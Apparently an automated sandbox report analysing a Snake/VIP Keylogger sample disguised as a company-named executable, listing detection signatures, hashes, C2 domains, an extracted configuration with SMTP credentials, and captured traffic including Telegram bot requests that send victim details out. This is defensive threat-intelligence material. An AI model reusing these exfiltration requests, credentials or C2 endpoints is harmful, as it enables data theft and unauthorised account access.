Windows Analysis Report
Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Overview

General Information

Sample name: Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Analysis ID: 1501092
MD5: b2fcde172f7605e8a4af7b60349418d7
SHA1: 7279c465e2ea6ced62c742c679db21ec9a9a4514
SHA256: 8fcc14a7d1f657fd1cf84282ad1d81404e7ccc253e9ad8f36ccd9118a674d6cc
Tags: exeSnakeKeylogger
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@laime.it", "Password": "Oqc9k0@9", "Host": "mail.laime.it", "Port": "587", "Version": "4.4"}
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "Oqc9k0@9", "Password": "mail.laime.it", "Host": "clone@glamourstorepa.com.br", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Virustotal: Detection: 60% Perma Link
Multi AV Scanner detection for submitted file
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Virustotal: Detection: 60% Perma Link
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe ReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49707 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49717 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49746 version: TLS 1.2
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 010AF45Dh 11_2_010AF2C0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 010AF45Dh 11_2_010AF4AC
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 010AFC19h 11_2_010AF961
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692E0A9h 11_2_0692DE00
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 069231E0h 11_2_06922DC8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 06920D0Dh 11_2_06920B30
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 06921697h 11_2_06920B30
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 06922C19h 11_2_06922968
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692E959h 11_2_0692E6B0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 11_2_06920673
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692F209h 11_2_0692EF60
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692CF49h 11_2_0692CCA0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 069231E0h 11_2_06922DC3
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692D7F9h 11_2_0692D550
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692E501h 11_2_0692E258
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692F661h 11_2_0692F3B8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692EDB1h 11_2_0692EB08
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692D3A1h 11_2_0692D0F8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692FAB9h 11_2_0692F810
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 11_2_06920853
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 11_2_06920040
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 0692DC51h 11_2_0692D9A8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Code function: 4x nop then jmp 069231E0h 11_2_0692310E
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 056BF2EDh 20_2_056BF150
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 056BF2EDh 20_2_056BF33C
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 056BFAA9h 20_2_056BF804
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 07030D0Dh 20_2_07030B30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 07031697h 20_2_07030B30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 07032C21h 20_2_07032970
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 070331E8h 20_2_07032DD0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703D1B1h 20_2_0703CF08
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703D609h 20_2_0703D360
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703DA61h 20_2_0703D7B8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703F8C9h 20_2_0703F620
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_07030673
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703FD21h 20_2_0703FA78
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 070331E8h 20_2_07033116
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703EBC1h 20_2_0703E918
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703F019h 20_2_0703ED70
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 070331E8h 20_2_07032DCA
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703F471h 20_2_0703F1C8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703DEB9h 20_2_0703DC10
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_07030040
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_07030853
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703E311h 20_2_0703E068
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Code function: 4x nop then jmp 0703E769h 20_2_0703E4C0

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 193.122.6.168 193.122.6.168
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49712 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49723 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49719 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49706 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49710 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49725 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49718 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49715 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49721 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49720 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49726 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49707 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49717 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
